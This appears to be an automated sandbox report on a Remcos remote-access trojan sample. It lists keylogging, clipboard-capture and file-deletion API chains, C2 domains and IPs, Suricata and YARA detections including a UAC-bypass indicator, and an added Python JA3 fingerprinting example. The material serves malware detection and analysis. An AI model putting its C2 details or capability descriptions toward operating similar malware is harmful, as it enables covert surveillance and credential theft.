            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004068CD FindFirstFileW,FindNextFileW
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0044BA59 FindFirstFileExA
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW

            Networking

            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49719 -> 103.186.116.145:52121
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49709 -> 103.186.116.145:52121
            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49720 -> 103.186.116.145:52121
            Source: Malware configuration extractor | URLs: 127.0.0.1
            Source: unknown | DNS query: name: officerem.duckdns.org
            Source: global traffic | TCP traffic: 192.168.2.9:49709 -> 103.186.116.145:52121
            Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1  Host: geoplugin.net  Cache-Control: no-cache
            Source: Joe Sandbox View | IP Address: 178.237.33.50
            Source: Joe Sandbox View | ASN Name: AARNET-AS-AP Australian Academic and Research Network AARNe
            Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49712 -> 178.237.33.50:80
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
            Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1  Host: geoplugin.net  Cache-Control: no-cache
            Source: global traffic | DNS traffic detected: DNS query: officerem.duckdns.org
            Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp, ZRuVeAoBoxootS.exe | String found in binary or memory: http://geoplugin.net/json.gp
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, ZRuVeAoBoxootS.exe, 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp8
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpB
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1601575428.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, ZRuVeAoBoxootS.exe, 0000000A.00000002.1677124907.00000000029C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
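The three severity-1 alerts above come from Emerging Threats rule 2036594, which fires on the JA3 hash of the Remcos client's TLS ClientHello rather than on the destination or port; the hash itself is not printed in the report. The Python below is an added example, not code from the report, from Suricata or from the ET ruleset; it shows how such a fingerprint is computed: parse the ClientHello, take the version, cipher list, extension list, supported groups and EC point formats as decimal values joined by "-", separate the five fields with ",", drop GREASE values, and MD5 the result. The ClientHello it runs on is constructed in the block (build_client_hello, sni and the field values are the example's own) and is not the traffic captured in the sandbox.

```python
import hashlib
import struct
from typing import List, Tuple

# GREASE values (RFC 8701) are excluded from JA3 so that a client's randomised
# placeholders do not change its fingerprint.
GREASE = {0x0A0A, 0x1A1A, 0x2A2A, 0x3A3A, 0x4A4A, 0x5A5A, 0x6A6A, 0x7A7A,
          0x8A8A, 0x9A9A, 0xAAAA, 0xBABA, 0xCACA, 0xDADA, 0xEAEA, 0xFAFA}


def _u16(buf: bytes, off: int) -> int:
    return struct.unpack(">H", buf[off:off + 2])[0]


def ja3_from_client_hello(record: bytes) -> Tuple[str, str]:
    """Return (ja3_string, ja3_md5) for a TLS record that carries a ClientHello.

    JA3 = TLSVersion,Ciphers,Extensions,EllipticCurves,EllipticCurvePointFormats
    with each list joined by '-' and GREASE values removed.
    """
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:5 + _u16(record, 3)]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    version = _u16(body, 0)
    pos = 2 + 32                       # legacy_version + 32-byte client random
    pos += 1 + body[pos]               # session id
    cs_len = _u16(body, pos); pos += 2
    ciphers = [_u16(body, i) for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]               # compression methods
    ext_types: List[int] = []
    curves: List[int] = []
    formats: List[int] = []
    if pos < len(body):
        end = pos + 2 + _u16(body, pos); pos += 2
        while pos + 4 <= end:
            etype, elen = _u16(body, pos), _u16(body, pos + 2)
            data = body[pos + 4:pos + 4 + elen]
            pos += 4 + elen
            ext_types.append(etype)
            if etype == 0x000A:        # supported_groups
                curves = [_u16(data, i) for i in range(2, 2 + _u16(data, 0), 2)]
            elif etype == 0x000B:      # ec_point_formats
                formats = list(data[1:1 + data[0]])

    def join(vals: List[int]) -> str:
        return "-".join(str(v) for v in vals if v not in GREASE)

    ja3 = ",".join([str(version), join(ciphers), join(ext_types), join(curves), join(formats)])
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


def build_client_hello(ciphers: List[int], extensions: List[Tuple[int, bytes]]) -> bytes:
    """Assemble a minimal TLS 1.2-style ClientHello record (constructed test input)."""
    ext = b"".join(struct.pack(">HH", t, len(d)) + d for t, d in extensions)
    body = (struct.pack(">H", 0x0303) + b"\x11" * 32 + b"\x00"
            + struct.pack(">H", 2 * len(ciphers)) + b"".join(struct.pack(">H", c) for c in ciphers)
            + b"\x01\x00" + struct.pack(">H", len(ext)) + ext)
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack(">H", len(hs)) + hs


def sni(name: str) -> bytes:
    """server_name extension body for one host_name entry."""
    host = name.encode()
    return struct.pack(">HBH", len(host) + 3, 0, len(host)) + host


# Constructed ClientHello: one GREASE cipher and one GREASE extension are
# included to show that they drop out of the fingerprint.
SAMPLE_HELLO = build_client_hello(
    ciphers=[0x1A1A, 0x1301, 0x1302, 0xC02B, 0xC02F],
    extensions=[
        (0x2A2A, b""),
        (0x0000, sni("c2.example.invalid")),
        (0x000A, struct.pack(">HHHH", 6, 0x001D, 0x0017, 0x0018)),
        (0x000B, b"\x01\x00"),
        (0x0023, b""),
    ],
)

if __name__ == "__main__":
    ja3_string, ja3_hash = ja3_from_client_hello(SAMPLE_HELLO)
    print(ja3_string)
    print(ja3_hash)
```

Two caveats when relying on a JA3 match like 2036594: the fingerprint depends on extension order, so clients that randomise it (recent Chrome does) produce unstable hashes, which is one reason newer tooling adds JA4; and a hash identifies the TLS library configuration, not the malware, so a Remcos build that switches its TLS stack would need a new rule even though the C2 protocol is unchanged.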

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000 (idHook 0x0D = WH_KEYBOARD_LL, a low-level keyboard hook)
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx

            E-Banking Fraud

            Source: Yara match | File source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5292, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR

            Spam, unwanted Advertisements and Ransom Demands

            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0041A76C SystemParametersInfoW

            System Summary

            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Code function: 0_2_02E1DEEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Code function: 0_2_071E6EF8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Code function: 0_2_071E6EE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Code function: 0_2_071E4D48
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Code function: 0_2_071E44D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Code function: 0_2_071E4910
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Code function: 0_2_071ED108
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Code function: 0_2_071E5180
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 10_2_028FDEEC
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 10_2_04F00040
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 10_2_04F00006
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 10_2_07156EF8
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 10_2_07156EE8
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 10_2_071544D8
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 10_2_07154910
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 10_2_07155180
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 10_2_0715C048
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00425152
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00435286
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004513D4
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0045050B
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00436510
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004316FB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0043569E
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00443700
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004257FB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004128E3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00425964
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0041B917
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0043D9CC
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00435AD3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00424BC3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0043DBFB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0044ABA9
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00433C0B
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00434D8A
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0043DE2A
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0041CEAF
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00435F08
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: String function: 00402073 appears 51 times
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: String function: 00432B90 appears 53 times
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: String function: 00432525 appears 41 times
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1611259289.00000000081E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1599809753.000000000114E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1599809753.00000000011D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameH; vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Binary or memory string: OriginalFilenamewGsy.exe> vs SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
